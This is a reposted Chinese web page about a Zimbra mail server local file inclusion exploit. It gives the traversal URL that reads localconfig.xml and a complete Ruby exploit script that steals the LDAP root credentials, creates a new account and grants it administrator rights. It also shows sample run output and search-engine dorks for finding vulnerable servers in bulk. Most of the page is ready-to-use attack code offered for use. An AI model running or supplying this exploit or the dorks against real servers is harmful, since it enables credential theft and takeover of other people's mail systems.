Zimbra 0day exploit / Privilegie escalation via LFI

  • A+
所属分类:漏洞时代
摘要

from:http://www.exploit-db.com/exploits/30085/影响版本:2009, 2010, 2011, 2012 and early 2013
测试方法:
[php]
http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00[/php]

from:http://www.exploit-db.com/exploits/30085/

影响版本:2009, 2010, 2011, 2012 and early 2013
测试方法:
<br /> http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

<br /> ----------------Exploit-----------------<br /> Before use this exploit, target server must have admin console port open "7071" otherwise it won't work.<br /> use the exploit like this : ruby run.rb -t mail.example.com -u someuser -p Test123_23<br /> [*] Looking if host is vuln....<br /> [+] Host is vuln exploiting...<br /> [+] Obtaining Domain Name<br /> [+] Creating Account<br /> [+] Elevating Privileges<br /> [+] Login Credentials<br /> [*] Login URL : https://mail.example.com:7071/zimbraAdmin/<br /> [*] Account : [email protected]<br /> [*] Password : Test123_23<br /> [+] Successfully Exploited !<br />
run.rb:
<br /> # /usr/bin/ruby<br /> #<br /> # Author: Eduardo Rubina H.<br /> # Email : rubina119[at]gmail.com<br /> # Date : 03 Dec 2013<br /> # State : Critical<br /> #<br /> # Description : This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml<br /> # that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies<br /> # and a lot of stuff also the lfi leets you see .bash_history, ssh pub keys, config files, etc.<br /> #<br /> #<br /> # LFI : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00<br /> #<br /> #</p><p>require 'net/https'<br /> require 'getoptlong'<br /> require './ultils.rb'</p><p>data = nil</p><p>def exploit_begin()<br /> puts "[+] Looking if host is vuln..."<br /> http = Net::HTTP.new( $host, 7071 )</p><p>http.use_ssl = true<br /> http.verify_mode = OpenSSL::SSL::VERIFY_NONE</p><p>req = Net::HTTP::Get.new( "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00", { "Accept-Encoding" => "gzip", "User-Agent" => "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" } )<br /> res = http.request( req )</p><p>case res<br /> when Net::HTTPSuccess then<br /> begin<br /> if res.header[ 'Content-Encoding' ].eql?( 'gzip' ) then<br /> sio = StringIO.new( res.body )<br /> gz = Zlib::GzipReader.new( sio )<br /> puts "[+] Host is vuln exploiting"<br /> resbody = gz.read()</p><p>part1 = resbody.gsub("/n", ' ').squeeze(' ')<br /> part2 = part1.gsub("a[", '').squeeze(' ')<br /> ldap_user = part2.match(/name=//"zimbra_user//">"; "<value>(.*?)<//value>/ui)[1]<br /> ldap_pass = part2.match(/name=//"zimbra_ldap_password//">"; "<value>(.*?)<//value>/ui)[1]</p><p>get_auth_token(ldap_user,ldap_pass)</p><p>else<br /> puts "[-] Host is not vulnerable !"<br /> return false<br /> end<br /> rescue Exception<br /> #puts "[-] Connection Failed !"<br /> return false<br /> end<br /> end</p><p>end</p><p>def get_auth_token(user,pass)</p><p>https = Net::HTTP.new( $host, 7071 )<br /> path = "/service/admin/soap"</p><p>https.use_ssl = true<br /> https.verify_mode = OpenSSL::SSL::VERIFY_NONE</p><p>body = "<?xml version=/"1.0/" encoding=/"UTF-8/"?><br /> <env:envelope xmlns:env=/"http://www.w3.org/2003/05/soap-envelope/" xmlns:ns1=/"urn:zimbraAdmin/" xmlns:ns2=/"urn:zimbraAdmin/"><env:header><ns2:context/></env:header><env:body><ns1:authrequest></p><account by=/"name/">#{user}</account><password>#{pass}</password><p></ns1:authrequest></env:body></env:envelope>"<br /> data = https.post(path, body, { "Content-Type" => "application/soap+xml; charset=utf-8; action=/"urn:zimbraAdmin#AuthRequest/"" } )<br /> $auth_key = data.body.match(/<authtoken>(.*)<//authToken>/iu)[1]<br /> exploit()</p><p>end</p><p>def exploit()</p><p>puts "[+] Obtaining Domain Name"<br /> get_domain_soap_data = "</p><getalldomainsrequest xmlns=/"urn:zimbraAdmin/"></getalldomainsrequest><p>"<br /> get_domain = Utils.new.request_soap_admin(get_domain_soap_data)<br /> domain = get_domain.match(/<a n=/"zimbraDomainName/">(.*?)<//a>/iu)[1]</p><p>puts "[+] Creating Account"<br /> create_account_soap_data = "</p><createaccountrequest xmlns=/"urn:zimbraAdmin/"><name>#{$user}@#{domain}</name><password>#{$password}</password></createaccountrequest><p>"<br /> create_account = Utils.new.request_soap_admin(create_account_soap_data)<br /> a_id = create_account.match(/account id="(.*)" name="/ui)[1]</p><p>puts "[+] Elevating Privileges"<br /> elevate_privs_soap_data = "</p><modifyaccountrequest xmlns=/"urn:zimbraAdmin/"><id>#{a_id}</id><a n=/"zimbraIsAdminAccount/">TRUE</a></modifyaccountrequest><p>"<br /> elevate_privs = Utils.new.request_soap_admin(elevate_privs_soap_data)</p><p>puts "[+] Login Credentials"<br /> puts " [*] Login URL : https://#{domain}:7071/zimbraAdmin/ "<br /> puts " [*] Account : #{$user}@#{domain}"<br /> puts " [*] Password : #{$password}"<br /> puts "[+] Successfully Exploited !"</p><p>end</p><p>def usage<br /> print( "<br /> -t, --target<br /> Host to attack ip or domain</p><p>-u, --useraccount<br /> The user name to be used to create the account, only alfanumeric chars.</p><p>-p, --password<br /> Password that will be used to create the account,<br /> pass needs to be alfanumeric upercase and lowercase and special chars, minchar(8).</p><p>-h, --help<br /> Print this help message</p><p>"<br /> )<br /> end</p><p>puts ""<br /> puts ""<br /> puts "#########################################################################################"<br /> puts "Zimbra Email Collaboration Server 0day Exploit by rubina119"<br /> puts "#########################################################################################"<br /> puts ""<br /> puts ""</p><p>opts = GetoptLong.new(</p><p>[ '--target', '-t', GetoptLong::REQUIRED_ARGUMENT ],<br /> [ '--useraccount','-u', GetoptLong::REQUIRED_ARGUMENT ],<br /> [ '--password','-p', GetoptLong::REQUIRED_ARGUMENT ],<br /> [ '--help','-h', GetoptLong::OPTIONAL_ARGUMENT ]<br /> )<br /> opts.each do |opt, arg|<br /> case opt<br /> when '--help'<br /> usage()<br /> when '--target'<br /> $host = arg<br /> when '--useraccount'<br /> $user = arg<br /> when '--password'<br /> $password = arg<br /> end<br /> end</p><p>if $host == nil</p><p>usage()</p><p>else</p><p>exploit_begin()</p><p>end<br />
ultils.rb
<br /> # /usr/bin/ruby</p><p>require 'net/https'</p><p>class Utils</p><p>def request_soap_admin(api_call)</p><p>@request=api_call</p><p>soap_client = Net::HTTP.new( $host, 7071 )<br /> soap_client.use_ssl = true<br /> soap_client.verify_mode = OpenSSL::SSL::VERIFY_NONE</p><p>soap_path = "/service/admin/soap"</p><p>soap_data = "<soap:envelope xmlns:soap=/"http://www.w3.org/2003/05/soap-envelope/"><soap:header></p><context xmlns=/"urn:zimbra/"><authtoken>#{$auth_key}</authtoken></context><p></soap:header><soap:body>#{@request}</soap:body></soap:envelope>"</p><p>response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=/"urn:zimbraAdmin/"" } )</p><p>if response.body.match(/Error/)<br /> error_res = response.body.match(/<soap:text>(.*?)<//soap:Text>/ui)[1]<br /> puts "[-] Response Error"<br /> puts " [*] #{error_res}"<br /> false<br /> else<br /> return response.body<br /> end</p><p>end<br /> end

批量搜索方法:title:zimbra web client sign in (百度下测试一搜索一大片)
inurl:7071 -intext:7071 inurl:zimbra
inurl:7071 intitle:zimbra administration
虽然有些没开7071但是配置文件还是能被包含出来,不知道里面加密的数据能不能被破解出来

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » Zimbra 0day exploit / Privilegie escalation via LFI
标签:Zimbra LFI

相关推荐

评论